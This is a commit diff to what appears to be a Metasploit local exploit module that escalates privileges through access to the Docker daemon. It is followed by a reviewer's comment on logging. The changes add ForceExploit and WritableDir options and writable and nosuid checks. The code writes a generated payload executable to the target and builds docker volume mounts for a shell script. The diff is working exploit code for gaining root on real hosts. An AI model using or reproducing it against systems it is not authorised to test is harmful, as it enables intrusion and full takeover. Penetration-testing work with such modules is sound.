Add check for writable and nosuid WritableDir
parent
d18c6bd158
commit
20fd6b6134
|
@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
}
|
||||
))
|
||||
register_advanced_options([
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false]),
|
||||
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
|
||||
])
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir'].to_s
|
||||
end
|
||||
|
||||
def check
|
||||
if cmd_exec('docker ps && echo true') =~ /true$/
|
||||
print_good("Docker daemon is accessible.")
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
print_error("Failed to access Docker daemon.")
|
||||
|
@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Vulnerable
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
|
||||
end
|
||||
end
|
||||
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
if nosuid? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
|
||||
end
|
||||
|
||||
pl = generate_payload_exe
|
||||
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
|
||||
exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
|
||||
print_status("Writing payload executable to '#{exe_path}'")
|
||||
|
||||
write_file(exe_path, pl)
|
||||
|
@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def shell_script(exploit_path)
|
||||
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
|
||||
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
|
||||
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
|
||||
|
||||
%Q{
|
||||
|
|
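Review bot: In the second hunk, the new `if is_root?` guard in `exploit` falls through without any output when `ForceExploit` is set, while the `check` guard directly above it logs `print_warning 'Target does not appear to be vulnerable'` before continuing. The module log should record that it proceeded on a session that already had root, so I would add `print_warning 'Session already has root privileges'` after the inner `unless` block. The two new `base_dir` preconditions would also benefit from a short comment such as `# fail early, before anything is written to the target`, and the `nosuid?` check from a line saying why the mount option matters to this module, because that reason is not visible in these hunks. The body of `exploit` continues past the end of the hunk, so this is based only on the lines shown.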